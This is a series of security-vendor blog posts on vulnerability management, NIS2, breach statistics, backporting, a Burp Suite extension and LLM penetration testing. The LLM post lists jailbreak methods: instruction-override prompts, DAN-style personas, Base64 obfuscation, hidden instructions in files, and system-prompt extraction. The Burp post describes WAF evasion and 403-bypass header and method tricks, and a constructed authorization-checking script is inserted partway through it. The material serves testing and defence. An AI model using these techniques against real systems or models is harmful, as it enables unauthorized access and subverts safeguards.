- We've reviewed 8,124 applications to ensure the license was the correct fit.
- We found sub-optimal licensing and recommended upgrades or downgrades on 1,846 of them.
- Our customers have actioned 1,555 changes to licenses to get them to a more appropriate level.

One large customer alone has upgraded around 600 assets and downgraded about 400 others over two years.

#### Three Key Benefits

1. Flexibility and value: You get better bang for your buck. If you spend $100k with us, you'll get the right testing for each asset, maximizing your security budget while making spending more predictable.
2. Mature security program: With a track record of upgrades and downgrades, you can show a dynamic, requirements-based vulnerability management program rather than following rigid checklists.
3. Better metadata: Edgescan has 19 metadata fields for each asset.
We populate six based on technical context, but you provide the other 12 about business impact, compliance requirements, and risk factors. This forces a healthy maturity in your asset management program.

#### Works at Scale

This approach especially benefits organizations with hundreds or thousands of applications. Your assets go into the system and come out with appropriate testing levels based on their actual risk profile and technical needs. Think of it as a funnel system that ensures each piece of technology gets exactly what it needs—no more, no less.

The metadata fields that drive our recommendations include things like PCI status, direct internet access, business criticality, information classification, and availability requirements. By using these factors to determine the right level of testing, we help ensure your security budget goes where it matters most.

More detailed information about asset metadata attributes is available in our public-facing knowledgebase here.

Schedule a demo to see how Edgescan's license suggestions can optimize your security budget while ensuring appropriate coverage for all your applications.

### How Edgescan Enhances M&A Success Through Cybersecurity Risk Management

In the world of mergers and acquisitions, cybersecurity has become a critical factor that can make or break a deal. Most M&A transactions involve rapid integration of different IT systems, applications, and data assets. This process exposes acquiring companies to unknown vulnerabilities, legacy systems, and potentially active breaches.

The financial implications are severe. According to Gartner, incomplete cybersecurity due diligence can lead to regulatory penalties, reputation damage, and significant financial loss.

#### The M&A Cybersecurity Challenge

When you acquire a company, you're also acquiring their security problems. Hidden vulnerabilities in legacy systems. APIs exposed to the internet. Misconfigured cloud assets.
These risks often surface after the deal closes, when remediation becomes exponentially more expensive. Post-acquisition breaches can cost millions in emergency patching, forensic investigations, and system overhauls. Regulatory fines under GDPR or CCPA add further damage. Customer trust, once lost, takes years to rebuild.

#### How Edgescan Addresses These Risks

Edgescan provides end-to-end vulnerability management that identifies and validates threats across the entire digital estate of both acquiring and target companies.

- Continuous Attack Surface Management discovers and profiles all digital assets - web applications, APIs, and network infrastructure. No asset goes unassessed.
- Validated Vulnerability Assessments combine automated scanning with human validation by CREST and OSCP-certified analysts. This reduces false positives and prioritizes real threats over scanner noise.
- Seamless Integration enables smooth onboarding of target company assets into the acquiring firm's cybersecurity ecosystem. Visibility and control continue throughout the transition.
- Risk-Rated Reporting provides actionable insights with clear priorities. Security teams focus on critical vulnerabilities first.

#### Real-World Impact: A 2025 Case Study

Early in 2025, Edgescan performed cybersecurity due diligence for a large enterprise acquiring a mid-sized technology firm. Our assessment uncovered several critical vulnerabilities in the target's infrastructure, including unpatched systems, exposed APIs, and misconfigured cloud assets. These findings were validated by our expert analysts and presented to the acquiring company's executive team.

As a direct result, the enterprise renegotiated the acquisition terms, reducing the purchase price by over $1,000,000. This protected the buyer from future remediation costs while demonstrating the strategic value of incorporating cybersecurity intelligence into M&A negotiations.
#### The Bottom Line

Cybersecurity is no longer a post-acquisition concern - it's core M&A strategy. Early detection of vulnerabilities transforms risk into negotiation leverage. Critical findings become cost savings opportunities.

Edgescan empowers organizations to make informed decisions by providing deep visibility into target companies' security posture. Through continuous monitoring and validated assessments, we protect acquiring firms from hidden risks while delivering measurable cost savings.

Ready to secure your next acquisition? Start here.

### Why Accuracy is the Bedrock of CTI, Vulnerability Management and Relieves Alert Fatigue

False positives in cybersecurity waste time and money. They happen when security tools flag normal activities as threats. This creates big problems for security teams who need to focus on real issues.

Think about it. You get hundreds of alerts. You check them one by one. Many turn out to be nothing. Meanwhile, actual threats might slip through. This isn't just annoying. It's dangerous.

#### The Foundation Matters

Top of the funnel matters most. If you start with bad data, everything that follows is compromised. You can add all the fancy threat intelligence and metadata you want. But if the original vulnerability report isn't accurate, you're just making the noise problem worse. All that extra information amplifies false positives instead of helping.

Accuracy isn't just important. It's essential.

#### The Real Cost of False Positives

#### 1. Resource Drain and Wasted Time

Security teams spend too much time chasing ghosts. The 2023 Ponemon Institute study showed organizations waste about 25% of their security team's time investigating things that aren't real threats. For teams already stretched thin, this means critical vulnerabilities sit unpatched longer. A security analyst who spends three hours checking a false positive could have used that time patching three critical vulnerabilities.
Unlike automated tools like Nessus or Qualys that flood you with unverified alerts, human-validated results focus your team on what really matters.

#### 2. Increased Operational Costs

False positives cost real money. Each alert needs investigation. That means people, computing resources, and sometimes expensive consultants. A medium-sized company might spend $150,000 yearly just handling false positives. Their mean time to remediation (MTTR) grows longer as teams chase phantom issues while actual vulnerabilities remain open. The difference between automated-only tools and expert-validated approaches can save thousands of hours and dollars annually.

#### 3. Alert Fatigue and Desensitization

"The security tool that cried wolf" is a real problem. When most alerts are false, teams start ignoring them. The 2024 ESG report found 34% of security professionals simply ignore certain alerts because they don't trust them. This creates a dangerous situation. When a real threat comes in, it might be overlooked.

One security team I worked with had so many false positives they created a "probably ignore" folder. They later found a critical vulnerability sitting there for weeks. Human-verified approaches ensure alerts deserve attention.

#### 4. Erosion of Trust in Security Tools

Teams stop trusting tools that lie to them repeatedly. They question results and may avoid using expensive security solutions altogether. Take scanning tools like Burp, Rapid7, or Qualys. They're powerful but need constant human verification. Without it, results vary wildly. One client told me they only trust about 40% of their vulnerability scanner results. A high accuracy rate (92% automated validation with 8% expert verification) builds trust that the results are worth acting on.

#### 5. Delayed Response to Real Threats

While teams handle false alarms, real threats wait. The 2025 Vulnerability Statistics Report showed high-risk vulnerabilities took 60% longer to fix when mixed with false positives. Attackers don't wait.
They exploit vulnerabilities quickly, especially in fast-moving DevOps environments. When your team finds a SQL injection vulnerability three weeks late because they were busy with false positives, that's three weeks attackers could have accessed your customer data.

#### 6. Impact on Compliance and Audits

False positives create compliance headaches. Organizations must document and justify every reported vulnerability, even fake ones. For industries like finance or healthcare under PCI DSS or HIPAA regulations, this doubles the paperwork. During one audit, a client had to explain 47 "critical vulnerabilities" that weren't actually vulnerabilities at all. They spent three days on documentation that added no security value. PCI-approved scanning with validated results eliminates this wasted effort.

#### 7. Negative Impact on DevOps and Business Agility

False positives break development workflows. They stop code releases and frustrate developers who must fix "problems" that don't exist. The 2024 Forrester study found 40% of DevOps teams see false positives as a major barrier to security integration. One development team told me they disabled certain security checks entirely because false positives delayed releases too often. This created actual security gaps. Accurate reporting that integrates smoothly with CI/CD pipelines keeps development moving without sacrificing security.

#### The Value of a False-Positive-Free Approach

The false positive problem needs a hybrid approach. Technology alone isn't enough. Neither is human review alone. You need both working together. Based on reviews from actual users (4.7/5 on Gartner Peer Insights), combining advanced analytics with expert validation eliminates almost all false positives. Security teams can focus on real issues instead of chasing shadows.

Companies using the old approach rely too heavily on automation. They produce lots of alerts but little confidence. Expert validation delivers intelligence you can act on.
This cuts alert fatigue, saves money, and speeds up fixing real problems.

#### The Bottom Line

False positives waste resources, cause alert fatigue, delay threat response, destroy trust in security tools, complicate compliance, and disrupt business. They create security gaps by distracting teams from real vulnerabilities.

A false-positive-free platform with human validation and full-stack coverage solves these problems. It offers a more efficient and reliable solution than traditional automated scanning alone.

### Why AI Security Testing Matters to Your Business: Understanding LLM Penetration Testing

AI systems like Large Language Models (LLMs) are now woven into the fabric of your business operations. They handle customer service inquiries, write content, analyze data, and sometimes even participate in decision-making processes. But as these powerful tools become central to your operations, a critical question emerges: how secure are they against attackers?

When your company deploys these AI tools, you face a new landscape of security risks unlike those of traditional systems. Hackers can manipulate LLMs in unique ways that bypass conventional security measures.

#### The Hidden Vulnerabilities in Your AI Systems

Security professionals use penetration testing (or "pentesting") to identify weaknesses before hackers do. With AI systems, this practice takes on new dimensions. Here's what can go wrong without proper testing:

- Information Leakage: Attackers can extract sensitive company information, intellectual property, or customer data that was inadvertently included in the AI's training data.
- Prompt Injection: Hackers can feed carefully crafted inputs that trick your AI into ignoring its safety guidelines. This is similar to how SQL injection works in databases but requires different testing approaches.
- Security Guardrail Bypass: Just as your teenage child might find creative ways around house rules, attackers create "personas" (like the DAN examples mentioned by security researchers) that trick LLMs into breaking their own rules.
- API Vulnerabilities: Your AI likely connects to other systems through APIs, creating potential entry points for attackers to access your broader infrastructure.

Real-world examples show these aren't theoretical concerns. Twitter's AI service (Grok) had a vulnerability where it would follow instructions hidden in other users' posts. This means someone could use your own AI tools as a gateway to attack your company's systems or reputation.

#### Penetration Testing for AI: What Your Security Team Should Be Doing

Your technology team needs to adapt traditional security testing approaches for AI systems. Here are key areas they should focus on:

#### 1. Information Gathering

Security testers should thoroughly map what your AI can access and its functionality. Can it read internal documents? Connect to customer databases? Send emails? The broader its access, the larger your attack surface becomes.

Pentesting teams should examine both direct model interactions (through chat interfaces) and indirect methods (through file uploads or web browsing features).

#### 2. Guardrail Testing and Prompt Injection

Skilled pentesters attempt to break your AI's ruleset through various techniques:

- Basic prompt injections that directly ask the AI to ignore previous instructions
- Persona adoption techniques where the AI is asked to role-play entities free from restrictions
- Base64 encoding or other obfuscation methods to slip restricted content past filters
- Using the AI's own error messages against it to reveal system information

Good pentesters try these approaches systematically, documenting which safety measures hold and which fail.

#### 3. Document and File Processing Security

If your AI can process uploaded files or browse websites, pentesters should test what happens when someone uploads documents containing hidden instructions or directs the AI to malicious web pages. This indirect prompt injection represents a serious risk many companies overlook entirely.

#### 4. Sensitive Data Exposure Testing

Penetration testers should probe whether your AI can be tricked into exposing:

- Authentication credentials
- Internal document contents
- Meeting summaries or calendar information
- Database connection details
- AWS keys or other cloud access tokens
- Production system details

#### 5. System Prompt Recovery

Pentesters attempt to extract the core instructions (system prompt) given to your AI. This can reveal internal policies, capabilities, and potential security bypasses that could be exploited.

#### Key Questions to Ask Your Security Team

As a business leader, you don't need technical expertise to ensure proper AI security. Ask these questions:

- "Have we conducted comprehensive penetration testing specifically tailored to our AI systems?"
- "What sensitive information repositories can our AI access, and have we tested the security of those connections?"
- "What attack scenarios involving our AI have we simulated, and what were the results?"
- "How do we test new LLM features before they reach production?"
- "Do we have a regular schedule for AI security testing, especially after model updates?"
- "What industry standards or frameworks are we following for AI security?"
- "How do our AI security measures compare to other companies in our industry?"

#### Practical Steps for Better AI Security

Even without a technical background, you can improve your company's AI security posture:

- Mandate Regular LLM Penetration Testing: Just as you would for websites and apps, require routine security assessments specific to AI.
- Apply the Principle of Least Privilege: Ensure your AI can only access the information and systems it needs to function.
- Implement Strong Authentication: Control who can interact with your AI systems, especially those with access to sensitive information.
- Create an AI Incident Response Plan: Prepare for what happens if your AI is compromised or begins producing harmful outputs.
- Consider Third-Party Experts: AI security is a specialized field. External penetration testers with LLM expertise can find vulnerabilities your internal team might miss.

#### The Business Case for AI Security Testing

AI security isn't merely a technical concern—it's a business imperative. The consequences of inadequate testing can include:

- Financial losses from data breaches or system compromises
- Regulatory penalties if customer data is exposed
- Reputation damage if your AI produces harmful content
- Loss of competitive advantage if proprietary information leaks
- Legal liability if your AI causes harm to users

The investment in proper AI security testing is minimal compared to these potential costs. Most AI security incidents happen not because the technology is inherently flawed, but because companies rush to implement it without appropriate security measures.

#### Looking Forward

AI capabilities will continue to expand rapidly, and so will the techniques attackers use to exploit them. Regular penetration testing helps you stay ahead of these evolving threats.

Make sure your security team treats AI systems with the same, if not greater, care as any other critical business system. The fundamental principles remain: identify vulnerabilities before attackers do, protect sensitive data, test thoroughly, and prepare for incidents.

Edgescan's specialized AI security assessment services can help you identify and remediate vulnerabilities in your AI systems before they become targets. Our expert team combines deep AI knowledge with proven security testing methodologies to deliver comprehensive protection for your most advanced technologies.

Remember, an ounce of prevention is worth a pound of cure.
Taking proactive steps with Edgescan to secure your AI systems today prevents costlier problems tomorrow. As AI becomes more deeply integrated into your business operations, partner with Edgescan for specialized AI penetration testing to ensure your innovations remain both powerful and protected.

Schedule a demo today to see how Edgescan can strengthen your AI security posture and safeguard your most innovative systems.

### NIS2: Six Months After Implementation – What We've Learned

In the high-stakes arena of modern cybersecurity, strong protection is essential for both business continuity and regulatory compliance. The NIS2 Directive represents the EU's most comprehensive cybersecurity legislation to date. Here's what we've seen six months after full implementation and how vulnerability management helps with compliance.

#### Current State of NIS2

NIS2 created a unified legal framework for cybersecurity across the EU. It raises cybersecurity standards through wider scope, clearer rules and stronger supervision tools. After coming into force in January 2023, EU countries had to add it to their laws by October 17, 2024 – a deadline that passed six months ago.

Unlike the original directive, NIS2 significantly expanded its reach. It added 8 more sectors to the original list, for a total of 15 sectors. This means thousands more organizations now face regulatory requirements for cybersecurity measures.

#### Real-World Implementation Challenges

The first six months have shown several challenges:

- Rules vary between countries
- Smaller organizations struggle with limited resources
- Fitting NIS2 with existing security systems is hard
- Checking supply chain security takes time
- Meeting incident reporting deadlines is tough

Companies need more than just firewalls and anti-virus. They must have plans for risk management, incident response, and supply chain security. Many are finding they need to be much more active with security.
#### Vulnerability Management: The Foundation of Compliance

As organizations work through initial compliance efforts, vulnerability management has become essential. You can't protect systems if you don't know where the weaknesses are. The directive requires regular risk assessment and mitigation. Companies that are doing well have:

- Regular scanning of all systems
- Ways to rank which issues to fix first
- Clear steps for fixing problems
- Automatic compliance reports
- Checks on supplier security

#### The Edgescan Approach: Lessons from the Field

Since NIS2's full implementation, we've helped many organizations meet requirements. Our platform provides the comprehensive coverage needed in today's regulatory environment.

#### 1. Continuous Testing

Edgescan provides continuous vulnerability scanning and assessment across both network infrastructure and application layers. This aligns with NIS2's requirement for organizations to regularly assess and mitigate risks. Companies using continuous assessment have demonstrated significantly faster compliance verification.

#### 2. Focus on What Matters

Not all security issues are equally important. Edgescan helps organizations focus on the biggest risks first. Initial NIS2 assessments have revealed that organizations using risk-based prioritization reduce their mean time to remediation by up to 60%, addressing critical issues before they impact compliance status.

#### 3. Complete Coverage

NIS2 requires security across all systems. Our full-stack approach checks everything from web applications to network equipment. This holistic view ensures nothing gets missed when proving compliance.

#### 4. Real Issues Only

False alarms waste time and resources. Edgescan combines automatic scanning with human experts who check each issue. This hybrid approach eliminates the noise that often plagues vulnerability management programs, allowing security teams to focus on genuine issues.

#### 5. Clear Documentation

NIS2 requires good documentation.
During the first six months, organizations with comprehensive reporting have navigated regulatory scrutiny more effectively. We provide reports that clearly show your security status and remediation efforts – essential evidence during compliance audits.

#### Enforcement Reality Check

With NIS2 now in full effect, enforcement has started. Early patterns show:

- Focus on critical infrastructure first
- Checks of documentation and processes
- Tests of incident response plans
- Reviews of supply chain security
- Questions about executive oversight

Organizations with good vulnerability management have generally done better in these assessments, establishing a pattern for future enforcement priorities.

#### Beyond Basic Compliance: Building Cyber Resilience

Smart organizations are using NIS2 to improve security, not just check boxes. Good vulnerability management protects against real threats. Forward-thinking companies are turning compliance investments into strategic security advantages by implementing a continuous, risk-based approach.

#### The Path Forward: Your NIS2 Strategy

Six months in, we have a clearer picture of what works. Organizations should adjust their strategies based on real enforcement patterns. Vulnerability management remains the foundation of effective compliance.

If you're still working toward full compliance, start now. If you've established baseline compliance, focus on optimization and integration with broader security programs. With Edgescan's comprehensive vulnerability management platform, you can handle NIS2 requirements with confidence while building stronger defenses against security threats in 2025 and beyond.

### Inside the 2025 Verizon DBIR: Edgescan's Critical Insights on Web Application Security

The 2025 Verizon Data Breach Impact Report paints a stark picture of web application security, and as someone who contributes hundreds of thousands of vulnerabilities yearly to this report, I see the truth daily at Edgescan.
We're proud to be a data source for this year's DBIR again - Verizon's annual report is crucial for industry understanding. Here's what's really happening in the web application layer, straight from our continuous scanning of APIs and web apps across thousands of domains.

#### Basic Web Application Attacks Are Back in Style

The "get in, get the data, get out" attacks are alarmingly common. With 1,701 incidents and 1,387 confirmed data compromises, these aren't isolated events. What worries me most? Every single breach came from external actors. No insider threats here - it's the bad guys coming at you from outside your walls.

But here's the twist: espionage now drives 61% of these attacks. That's a major shift from financial motives dominating previous years. The data they're after? Mostly "other" data (65%), but personal information (36%) and credentials (35%) are right behind.

#### The Credential Crisis Gets Worse

The numbers don't lie. Stolen credentials power 88% of web application breaches. Where are attackers finding these credentials? Web applications (39%), development environments and CI/CD pipelines (66%), and cloud infrastructure (43%). That's right - your development secrets are more exposed than your web apps.

The credential ecosystem is sophisticated:

- Infostealers grab passwords and cookies
- Marketplaces sell them
- Premium channels offer exclusive access
- Live logs give real-time access to breached data

And remember - 54% of ransomware victims had their domains in infostealer logs. The connection is clear.

#### What Our Vulnerability Data Shows

Our 2025 Vulnerability Statistics Report digs deeper into what automated scanners miss.
Here's what you need to know:

- Over 33% of vulnerabilities found across the stack are critical or high severity
- SQL Injection (CWE-89) is still the top web vulnerability - it's been that way since 2022
- Web apps take longer to fix: 74.3 days vs 54.8 days for network issues
- Larger companies are worse at patching: 45.4% of their vulnerabilities remain unfixed after 12 months

The numbers are staggering: 40,009 new CVEs in 2024. CISA added 185 to their Known Exploited list. And 768 CVEs saw real-world attacks - that's 20% more than 2023.

#### Different Industries, Different Problems

Software companies fix things faster (63 days average). Construction firms? Not so much (104 days). The gap shows how industry matters in security response.

But here's something troubling: the complex vulnerabilities that automated tools miss? You need human expertise to find them. And those are often the ones that matter most.

#### The Attack Methods Keep Working

The basics still work:

- Brute force attacks haven't gone away
- VPN and edge device exploits jumped from 3% to 22%
- 42% of exploits hit web applications
- Once in, attackers use backdoors to maintain access

#### What Really Needs to Change

Based on what we see daily:

- MFA Implementation: Multi-factor authentication should be mandatory, not optional, for both externally exposed applications and remote network access.
- Scrutinize Logins: Implement additional protection around cookies and session keys.
- Passphrase Management: Encourage long passwords and secure configurations.
- OS Hardening: Secure configurations for endpoint systems and domain controllers.
- Continuous Vulnerability Management: Establish and maintain a vulnerability management process.
- Establish and Maintain a Remediation Process: Prioritize vulnerabilities which matter.

The stats don't lie. Web applications remain a prime target, credentials are too easy to steal, and most organizations aren't patching fast enough.
The threat actors are organized, motivated, and successful.

Download our full Vulnerability Statistics Report for the complete data: https://www.edgescan.com/stats-report/

The trend is clear. Are you ready for what's coming?

### Agartha: A Practical Burp Suite Extension for Smarter Web Security Testing

If you spend a lot of time doing web application security testing, you're probably using Burp Suite. And if you're using Burp Suite, you’ve likely explored its extension library to make your work easier or more efficient. One extension I use almost every day is called Agartha. It’s not flashy. It’s not hyped up. But it works—and it’s helped me spot real issues faster and with less effort.

This post isn’t a sales pitch. I’m not affiliated with the developer. I just think it’s a solid tool that more people should know about. If you're doing penetration testing or red teaming, Agartha can save you time and help you dig a little deeper.

Let’s look at what it does, how it works, and why I keep it in my Burp Suite setup.

#### What Is Agartha?

Agartha was developed by Volkan Dindar and is a free extension available through the BApp Store in Burp Suite. It includes several tools, but at its core, it helps you build smarter payloads, explore access controls, and automate common testing tasks. It’s aimed at testers who already know what they’re doing but want a more efficient way to do it.

There’s no magic involved. Agartha doesn’t replace your judgment or your skills. But it can reduce repetitive work, expose issues that are easy to miss, and give you helpful shortcuts.

#### Dynamic Payload Generator

One of Agartha’s most useful features is its Dynamic Payload Generator. This lets you quickly build lists of payloads to test for common vulnerabilities. It covers things like:

- SQL injection (SQLi)
- Local File Inclusion (LFI)
- Remote Code Execution (RCE)

The extension comes preloaded with payload templates and bypass tricks. You can also customize your own.
What’s helpful here is that Agartha adjusts payloads in real time, letting you adapt on the fly as you test.

And these aren’t just the same 10 strings you’ve seen on every cheat sheet. Agartha includes evasion techniques—things like altered encodings, header tricks, and subtle format changes. These can help you slip past filters or protections like WAFs.

You could build all of this manually, but doing it with Agartha saves time. It also helps keep your testing organized, especially when working under time pressure.

#### Authorization Matrix

Access control is often overlooked, and it’s hard to test thoroughly. Agartha helps with this through something it calls the Authorization Matrix.

Here’s how it works. You test an application as different users—maybe an admin, a regular user, and a guest. Agartha tracks which URLs each one accesses and builds a map. If one user can access something they shouldn’t, it flags that.

This isn’t a full access control scanner. It won’t write your report for you. But it gives you a simple view of where access breaks down.

For example, maybe a regular user shouldn’t be able to hit /admin/users. You try it—and you get a 200 OK. Agartha logs that as a mismatch. This makes it easier to spot privilege escalation paths, especially in apps with dozens (or hundreds) of endpoints.

You can also export this matrix and use it as evidence in your findings. Clients appreciate seeing this kind of data—it’s clearer than a paragraph of text.

#### Convert HTTP Requests to JavaScript

Sometimes, you need to build a proof of concept. You’ve found an XSS, or maybe a CSRF. Now you want to show it in action.

Agartha helps by converting HTTP requests into JavaScript. This saves you the time of writing out fetch() or XMLHttpRequest code by hand. You copy the request, click a button, and Agartha turns it into JavaScript. You can then drop this into a payload, a test page, or a browser console.

This is especially useful when chaining vulnerabilities—say, combining XSS with RCE or CSRF.
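To make the Authorization Matrix idea from the section above concrete, here is an added example (my own illustration, not Agartha's code) that replays the same endpoints as several roles, classifies each response as access or denial, and flags cells that contradict an expected policy. The endpoints, roles and responses are constructed sample data.

```python
"""Authorization matrix check: observed per-role access vs. expected policy.

Constructed example illustrating the idea behind Agartha's Authorization Matrix.
Not Agartha's code; policy, endpoints and responses below are made up."""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Expected policy: which roles should be able to reach each endpoint (constructed).
POLICY: Dict[str, Set[str]] = {
    "/dashboard": {"admin", "user"},
    "/admin/users": {"admin"},
    "/admin/settings": {"admin"},
    "/api/orders": {"admin", "user"},
    "/public/status": {"admin", "user", "guest"},
}


@dataclass(frozen=True)
class Observation:
    """One request replayed as one role, and what the server answered."""
    role: str
    method: str
    path: str
    status: int
    location: str = ""  # Location header on redirects, empty otherwise


def is_allowed(obs: Observation) -> bool:
    """Did the role actually reach the resource?

    2xx counts as access. A redirect to a login page counts as denial; any other
    redirect counts as access (the app accepted the request and moved on).
    4xx/5xx count as denial. A 200 carrying a 'not authorised' body (soft 403)
    is misclassified here, so flagged rows still need manual confirmation."""
    if 200 <= obs.status < 300:
        return True
    if 300 <= obs.status < 400:
        return "login" not in obs.location.lower()
    return False


def build_matrix(observations: List[Observation]) -> Dict[str, Dict[str, bool]]:
    """path -> role -> got access?  A later observation for the same cell wins."""
    matrix: Dict[str, Dict[str, bool]] = {}
    for obs in observations:
        matrix.setdefault(obs.path, {})[obs.role] = is_allowed(obs)
    return matrix


def find_mismatches(matrix: Dict[str, Dict[str, bool]],
                    policy: Dict[str, Set[str]]) -> List[Tuple[str, str, str]]:
    """Return (path, role, kind) where kind is:
    unexpected-access  role got in although the policy forbids it (privilege
                       escalation, e.g. a regular user reaching /admin/users)
    unexpected-denial  policy allows the role but the app refused (a functional
                       bug, or the test session for that role was not valid)
    untested           no observation for that cell, so nothing can be claimed"""
    roles = sorted({r for allowed in policy.values() for r in allowed})
    findings: List[Tuple[str, str, str]] = []
    for path in sorted(policy):
        for role in roles:
            expected = role in policy[path]
            observed = matrix.get(path, {}).get(role)
            if observed is None:
                findings.append((path, role, "untested"))
            elif observed and not expected:
                findings.append((path, role, "unexpected-access"))
            elif expected and not observed:
                findings.append((path, role, "unexpected-denial"))
    return findings


def render_matrix(matrix: Dict[str, Dict[str, bool]],
                  policy: Dict[str, Set[str]]) -> str:
    """Plain-text grid for a report: ALLOW/DENY per cell, '!' where the observed
    result contradicts policy, '?' where the cell was never exercised."""
    roles = sorted({r for allowed in policy.values() for r in allowed})
    lines = ["endpoint".ljust(18) + "".join(r.ljust(10) for r in roles)]
    for path in sorted(policy):
        cells = []
        for role in roles:
            observed = matrix.get(path, {}).get(role)
            if observed is None:
                cell = "?"
            else:
                cell = "ALLOW" if observed else "DENY"
                if observed != (role in policy[path]):
                    cell += "!"
            cells.append(cell.ljust(10))
        lines.append(path.ljust(18) + "".join(cells))
    return "\n".join(lines)


# Constructed sample: the same GET requests replayed as admin, user and guest.
OBSERVATIONS = [
    Observation("admin", "GET", "/dashboard", 200),
    Observation("user", "GET", "/dashboard", 200),
    Observation("guest", "GET", "/dashboard", 302, "/login?next=/dashboard"),
    Observation("admin", "GET", "/admin/users", 200),
    Observation("user", "GET", "/admin/users", 200),  # the post's example: should be denied
    Observation("guest", "GET", "/admin/users", 302, "/login"),
    Observation("admin", "GET", "/admin/settings", 200),
    Observation("user", "GET", "/admin/settings", 403),
    Observation("guest", "GET", "/admin/settings", 403),
    Observation("admin", "GET", "/api/orders", 200),
    Observation("user", "GET", "/api/orders", 401),  # allowed by policy, refused by app
    # no guest observation for /api/orders: that cell stays untested
    Observation("admin", "GET", "/public/status", 200),
    Observation("user", "GET", "/public/status", 200),
    Observation("guest", "GET", "/public/status", 200),
]

if __name__ == "__main__":
    matrix = build_matrix(OBSERVATIONS)
    print(render_matrix(matrix, POLICY))
    for path, role, kind in find_mismatches(matrix, POLICY):
        print(f"{kind:18} {role:6} {path}")
```

The untested and unexpected-denial rows matter as much as the escalation row: an expired test session for one role produces a matrix full of denials that looks safe but proves nothing.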
Agartha helps you move quickly from discovery to demonstration.

#### 403 Bypass Testing

We’ve all run into this: you try to access a page, and you get a “403 Forbidden” response. It’s frustrating, and sometimes the block isn’t as solid as it looks.

Agartha has a built-in 403 Bypass module. It tries small changes to see if the restriction can be bypassed. That might mean:

- Modifying headers like X-Original-URL or X-Rewrite-URL
- Changing the request method
- Adjusting the URL (adding a trailing slash, dot, or encoded character)

None of these tricks are new. But having them all in one place, and being able to automate them, makes the process faster. You don’t have to remember every variation or write a script on the fly.

And yes, sometimes it works. You’ll find a bypass and gain access to something the app was trying to hide. Even when it doesn’t work, you’ve ruled out some options quickly and can move on.

#### Why I Use It

Agartha isn’t the only tool out there that does these things. You can find scripts, other extensions, or write your own. But what I like about Agartha is that it puts several useful tools in one place—and they all work well together.

It helps with payload generation, access testing, proof-of-concept building, and bypass attempts. That’s a lot of value for one extension. And it fits into my existing workflow without slowing me down.

I don’t rely on it blindly. I still write my own payloads and do manual checks. But when I want to save time or double-check something, Agartha is where I go.

#### A Few Things to Keep in Mind

- Agartha is best used by testers who already know the basics. It’s not a teaching tool.
- It doesn’t replace logic or experience. It supports your testing—it doesn’t do it for you.
- Like any tool, it can give false positives or miss things. Always confirm what you find.
- You’ll get more out of it if you customize the payloads and explore all the features.

#### Final Thoughts

There’s a lot of noise in the security tool space.
New scanners, AI-based platforms, and one-click pentesting tools show up every week. Most of them promise too much and deliver too little.

Agartha doesn’t do that. It’s simple, practical, and focused. If you do hands-on testing with Burp Suite, it’s worth trying.

You won’t find marketing pages or slick videos for it. Just an honest tool that can make your job easier.

If you haven’t used Agartha yet, give it a shot. And if you already use it, I’d be curious to hear what you think—or how you use it differently.

### Edgescan Recognized in Forrester’s 2025 Security Guide

We’re pleased to share that Edgescan is included in Forrester’s Top Recommendations for Your Security Program, 2025. This is one of the most widely read cybersecurity reports each year, and being featured in it is a meaningful acknowledgment of the work we do.

Forrester highlights continuous security testing as a key capability for 2025. Edgescan is listed among the select group of vendors delivering this capability. In a crowded space, that kind of recognition matters.

Security leaders face constant change — evolving threats, new regulations, and shifting technologies. Forrester’s report provides clear, actionable guidance to help navigate these changes. It focuses on four areas:

- Managing new business and legal consequences
- Adapting to changing technology
- Responding to evolving threat landscapes
- Preparing for emerging technologies

Continuous security testing supports all four. Visibility is important, but it’s just the start. Validating exposures, prioritizing risk, and enabling response are essential steps — and that’s where Edgescan plays a role.

We’re proud to be trusted by organizations to secure cloud environments, application code, and infrastructure. Inclusion in this report reinforces that our approach aligns with the industry's needs.

This guide is a valuable resource for planning your 2025 strategy. If you’re already working with Edgescan, thank you.
We look forward to continuing to support your security goals.

You can access the full report here (if you have a subscription): https://www.forrester.com/report/top-recommendations-for-your-security-program-2025/RES182128

### ‘Backporting’ Challenges in Cyber Security

#### Overview of ‘Backporting’ in Cyber Security

Backporting is the process of taking security patches, bug fixes, or feature updates from a newer version of software and applying them to an older version that is still in use. This is often necessary when organizations rely on legacy systems that cannot be upgraded to the latest version due to compatibility, operational, or dependency constraints.

Common scenarios where backporting is used:

1. Security Patching in Legacy Systems

   Scenario: An organization is running CentOS 7, which includes an older version of OpenSSL. A critical vulnerability (e.g., Heartbleed) is discovered, but upgrading to the latest OpenSSL version would break compatibility with existing applications.

   Backporting Solution: The administrative team applies a backported security patch from the latest OpenSSL version while keeping the same CentOS 7 OpenSSL package version to maintain compatibility.

2. Maintaining Stability in Enterprise Software

   Scenario: A financial institution relies on a custom-built web application that runs on an older version of Java (JDK 8). Upgrading to JDK 17 would require significant code refactoring, delaying business operations.

   Backporting Solution: The organization applies specific JDK 17 security fixes to JDK 8, ensuring critical vulnerabilities are patched while avoiding a full upgrade.

#### Difficulties with ‘Backporting’ in Cyber Security

Backporting is often used as a temporary solution to maintain security in legacy systems, but it introduces significant risks and challenges from a cybersecurity standpoint.
Backporting often creates issues for cyber security teams, such as patch tracking, residual risk, delays in responding to emerging threats, and audit and compliance complications.

#### 1. Incomplete Security Fixes & Residual Vulnerabilities

Backported patches may fix specific vulnerabilities but often lack the broader security improvements found in newer software versions. Systems may remain vulnerable to related exploits or attacks that the newer version fully mitigates.

Example: A backported OpenSSL patch may fix a buffer overflow issue, but newer versions include hardened memory protections that aren't included in the backport, leaving the system partially vulnerable.

#### 2. Delayed Response to Emerging Threats

Adapting and testing security patches for older versions takes time, leading to delayed deployments. As a result, organizations remain exposed to zero-day vulnerabilities for longer periods, increasing risk. It is recommended that organizations develop a patching policy that prioritizes official updates over backporting whenever possible.

Example: A new RCE (Remote Code Execution) vulnerability is discovered in Apache 2.4.58. However, the organization runs Apache 2.4.29 and needs to backport the fix. The process of backporting takes weeks or months, increasing the attack window for adversaries.

#### 3. Security Compliance & Audit Challenges

Many security frameworks (e.g., PCI-DSS, NIST, ISO 27001, NIS2, GDPR) require the use of vendor-supported software and timely patching. Backporting complicates compliance verification. Security scanners detect outdated software versions and report vulnerabilities that are technically false positives, because version-based vulnerability scanning does not perform an architectural review of the components of the system being assessed.
Backporting can often lead to auditors rejecting backported patches unless extensive documentation is provided. This is especially true for the regular PCI-DSS ASV assessments performed with scanning systems, as required by PCI-DSS, because PCI ASVs are bound by rigorous requirements for specific ‘scanning’ methods and a findings doctrine.

